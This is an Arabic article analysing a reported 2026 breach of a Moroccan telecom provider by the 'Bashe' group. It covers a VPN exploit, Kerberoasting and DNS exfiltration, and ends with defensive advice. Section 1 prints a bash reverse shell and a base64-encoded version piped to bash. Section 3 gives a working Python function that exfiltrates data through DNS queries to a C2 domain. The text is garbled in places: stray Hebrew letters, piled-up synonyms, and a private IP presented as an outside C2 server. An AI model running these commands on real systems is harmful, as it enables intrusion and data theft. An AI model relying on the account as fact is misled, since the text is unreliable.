اختراق المغرب 2026: تحليل شامل لسرقة 30 جيجابايت من البيانات على يد مجموعة "Bashe"

في أوائل عام 2026، تغير مشهد الأمن السيبراني المغربي بشكل دائم عندما تمكنت مجموعة تهديد سيبراني خطيرة تُعرف باسم مجموعة 'Bashe' من اختراق خوادم وسرقة و استخراج أكثر من 30 جيجابايت من بيانات العملاء الحساسة للغاية من مزود اتصالات وطني رئيسي. لم يكن هذا الاختراق عبارة عن عملية عشوائية من قبل قراصنة مبتدئين (script-kiddie)؛ بل كان هجوماً مُنسقاً للغاية ومعقداً من نوع التهديد المستمر المتقدم (APT)، باستخدام أحدث تقنيات التخفي والتشويش المصممة خصيصاً لاختراق البنية التحتية الحيوية المغربية.

1. متّجه الهجوم الأوّلي: الصَدفة العكسية (Reverse Bash Shell) عبر ثغرات بوابة الـ VPN

اكتسبت الخلية التخريبية 'Bashe' هذا الاسم بسبب كثرة استغلالها وبرمجتها لأكواد الـ (Bash) المتقدمة وحيل تشويش قنوات الأوامر العكسية. تشير التحاليل الرقمية والأدلة الجنائية الأولية (Forensics) إلى أن نقطة الدخول وبداية الاختراق بدأت عند حافة السور الأمني—وتحديداً من خلال استغلال خادم و بوابة (VPN) مهملة وغير محدثة ولم يتم ترقيعها، مما جعلها عرضة لثغرة تنفيذ أسطر التعليمات البرمجية عن بعد (RCE) التي لا تتطلب حتى وجود أسماء وحساب دخول (Pre-Auth).

ومن أجل الهروب وتخطي أجهزة وتطبيقات جدار الحماية من الجيل التالي (NGFW) وأنظمة اكتشاف و استجابة النقاط النهائية (EDR) المتقدمة التابعة للشركة، لم يقم المهاجمون بإرسال وحفظ ملف تنفيذي مصاب لسطح المكتب. بل بدلاً من ذلك، قاموا بضخ وتنفيذ حزمة برمجية خبيثة هجينة من لغات (Python و Bash) مُموهة ومُشفرة بشدة لتعمل مباشرة وخفية بالكامل داخل الذاكرة العشوائية الحية للمخّدم.

# جزء من الكود الذي تم تفكيك شفرته والذي اعتمد عليه قراصنة Bashe لإيجاد موطئ قدم
# اعتمد الهجوم على التشفير بنظام base64 مندمجاً مع مقابس بروتوكول TCP الأصلية للتهرب من التفتيش الحدودي.

export RHOST="192.168.1.100" # عنوان خادم القيادة والسيطرة (C2) الخاص بالهاكر
export RPORT=443

# خلق وفتح قناة تحكم وتوجيه أوامر عكسية خفية باستخدام إمكانيات نظام اللينكس فقط (CoreUtils)
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'

# الكود الخبيث الفعلي المستخدم كان مشفرا، متجاوزاً بذلك كاسحات وأنظمة حرس الـ SIEM العادية للمؤسسة:
echo "YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC4xLjEwMC80NDMgPCYxJw==" | base64 -d | bash

2. الحركة الجانبية (Lateral Movement) والفتك بخوادم (Active Directory)

بمجرد تجاوزهم الجدار الحدودي وتسللهم لمنطقة الـ DMZ المنعزلة، وجد المتسللون أنفسهم عالقين داخل حساب خدمة تافه بلا صلاحيات وتأثير. وللتحرك والانتقال من هذا المكتب لاقتحام قطاعات وقواعد البيانات المركزية وسجلات الفوترة وإدارات الشؤون الخاصة بالعملاء، وظفوا وهندسوا هجوماً متقدماً عُرف في الأوساط بـ الـ Kerberoasting. حيث قام المهاجمون، بخداع وطلب أذونات وصول لتذاكر خدمية من وحدات التحكم في خوادم الدومين للتمويه بطلب الحصول على تذكرة لحسابات ذات أسماء رسمية مصدقة (SPNs)، مما سهل لهم سحب وسرقة صيغ وكلمات المرور المشفرة وإخراجها لخوادمهم الخارجية لتكسيرها.

غالباً ما تعاني شركات الأعمال والمنشآت الضخمة الكبرى بالمغرب من إهمال وبنية تكوينات وهندسة قديمة مهترئة لخوادم وبرامج شبكات الـ (Active Directory). في هذه الواقعة الدقيقة، تم الاعتماد والإبقاء على حماية حساب خدمة رفيع المستوى بكلمة مرور غبية وضعيفة، مما فتح المجال والباب لمجموعة 'Bashe' لتكسير وتهشيم حماية وشفرة ذلك الحساب في غضون بضع ساعات فقط مستغلين ومُسخرين طاقة التكسير المهولة لمعالجات ورامات الـ (GPU).

3. تسريب وخروج البيانات: أسلوب التعتيم واستغلال نفق הـ (DNS Tunneling) البطئ والخفي

لقد كان الجانب والمحور الأكثر رُعباً وإثارة في حكاية وتسرب كل تلك الـ 30 جيجابايت الفائقة الخصوصية هو كيفية مرورها و انسلالها ببراعة تامة من قِبل أنظمة حجر ومنع تسريب البيانات (DLP). لو قام أحدهم بصياغة مسار مفاجئ وضخ بيانات بمقدار 30 جيجابايت دفعة واحدة ورفعها عبر طلب HTTP POST قياسي لخادم و IP روسي مجهول، لكانت صافرات الاستشعار ستصرخ فورياً وتُدمر الخط. بدلًا من ذلك، طبقت الخلية المهاجمة تكتيك وتسخير أنفاق شبكات الـ (DNS Tunneling).

من خلال اقتطاع وتقطيع جداول سجلات بيانات المشتركين (المعلومات الشخصية PII، وفواتير الخط، والرسائل الوصفية لحركة الاتصالات) لأجزاء وكتل صغيرة لا تكاد تُرى، ثم تشفيرها بأرقام وقوالب الـ (base32)، ليتم بعد ذلك ربط هذا الكود ولصقه وجعله كنطاق إضافي جانبي فرعي ضمن طلب استعلام و توجيه DNS لعنوان خادم يتحكمون به؛ مما دمج وأذاب بيانات الاستخراج مع حركة المرور العادية لبروتوكول UDP (بورت 53)، والتي غالبا تعبر بسلاسة كمسار استعلامي للشبكة ولن تثير أي شك ولا حتى حظر من الجدار الناري.

# سكريبت برمجية بلغة بايثون يوضع كيف وظفت وبنت الخلية كوداً لسحب وتشفير البيانات وإرسالها مخفية في أوامر الـ DNS
import base64
import dns.resolver

def exfiltrate_chunk(data_chunk, c2_domain):
    # تشفير البيانات والمعلومات الحساسة كخطوة أساسية ليتم نقلها ودمجها بسلام في مسار وتنسيق أمر الـ DNS
    encoded_data = base64.b32encode(data_chunk.encode()).decode().lower().replace('=', '')
    
    # بناء وإنشاء استعلام DNS معدل بدقة بصيغة: <البيانات_السرية>.c2_domain.com
    query = f"{encoded_data}.{c2_domain}"
    
    try:
        # سحب وتمرير البيانات للخارج وتهريبها بمجرد القيام بحل ودفع سجل واسم النطاق الوهمي للخارج
        dns.resolver.resolve(query, 'A')
    except Exception as e:
        pass # عدم الاكتراث لأعراض وتجاوز وتجاهل فترات القطع، لكون الخادم الـ C2 الشرير التقط وقرأ مسبقاً مسار النطاق المسروق

exfiltrate_chunk("CUSTOMER_ID:84719,BALANCE:5000MAD", "bashe-c2-server.net")

4. الأبعاد والتداعيات الاستراتيجية والصدمة في مشهد الاقتصاد المغربي التقني

إن تداعيات وصدى وآثار هذا الثقب والاختراق تمتد لأميال وتأثيرات أوسع بكثير من سياق وحيز شركات البينة التحتية والاتصالات والهواتف. تقوم اللجنة الوطنية لمراقبة حماية المعطيات ذات الطابع الشخصي (CNDP) ومقر وشُعبة الإدارة العامة لأمن نظم المعلومات (DGSSI) بتسريع وتوسيع وتغليظ عمليات الإلزام بتنفيذ تدابير عقابية و التزامات ومتطلبات صارمة للغاية لتنظيم وحماية مُشغلي الأنظمة الحساسة و البنية التحتية والمؤسسات القومية الحيوية.

توجيهات أمنية واستراتيجيات حازمة وفورية طارئة لقادة التكنولوجيا وتكنولوجيا المعلومات في المغرب:

• إقرار وتنفيذ مفهوم انعدام الثقة المطلقة (Zero Trust): بوابات وتقنيات הـ (VPN) الحالية وحدها لم تعد حاجزاً وتقييداً كافياً وموثوقاً لغلق الباب. بات الأمر محسوماً وأصبح العزل و التشريح المُصغّر (Micro-segmentation) في قلب و جوف الشبكة إلزاميا لفصل أنظمة الحسابات و كشوف الأجور فعلياً وبحزم وعزل ملموس عن إمكانية أي وصول أو ارتباط بتطبيقات الإنترنت أو البوابات المتصلة بالعالم.
• المراقبة والسيطرة الخانقة لنشاط الـ DNS: من الواجب والإجباري لغرف وإدارة وفرق مراكز العمليات الأمنية (SOC) ألا تغفل وتراقب بدقة متناهية أحجام وتقلبات واستعلام حزم بروتوكول الـ DNS والتفتيش عن مؤشرات شذوذ أو تذبذب طول استعلامه. لم تعد محركات הـ DNS مجرد عنوان بنية تحتية خدمية بريئة لتسهيل الاتصال؛ بل أصبحت سلاحا وباباً ومتجهاً هجومياً بحد ذاته.
• البحث الاستباقي للتهديد وصيد الأشباح النشط (Threat Hunting): يجب وبشدة التوقف عن النوم والاعتماد وافتراش أنظمة الحماية الجاهزة والبدء فعلياً والاعتماد في المؤسسات النشطة على هندسة أليات البحث والصد الفعلي النشط عن ومكافحة الأكواد والهياكل التشغيلية الشبحية والمسببة للهلع والمموهة (في بيئة وثنايا الذاكرة العشوائية In-memory)، بدلًا من الركون الأعمى والاتكال فقط وحصرا للملفات التوقيعية القياسية، والبرمجيات والمضادات التقليدية لفحص ملفات الفيروسات الميتة والمعروفة.

خاتمة المطاف والرسالة الفاصلة

إن الاختراق والتسلل الشامل الذي نجحت وأدارته خلية ومجموعة 'Bashe' هو درس ويشكل جرس وتذكير وحشي وتنبيه صارم يبرهن أنه ولم يعد هناك استثناء؛ وبأن مؤسسات وشركات المغرب الوطنية هي بلا منازع وفي عين وبؤرة الاستهداف وتقع بحزم في نطاق المرمى الناري العالمي وعصابات مجاميع التهديدات الآسيوية المتقدمة الدائمة (APTs). لا تقرأ هذه التهديدات وتتكل وببساطة وتهدأ... فالتهديدات المُركبة والمستديمة المتقدمة والفائقة التعقيد تستدعي وتتطلب تسخير وتحصين واستثمار عقول وفرق وبناء جدران دفاعية مُتطورة وقُلوب مراقبة يقظة ودفاعات عنيدة ومستديمة بالمثل.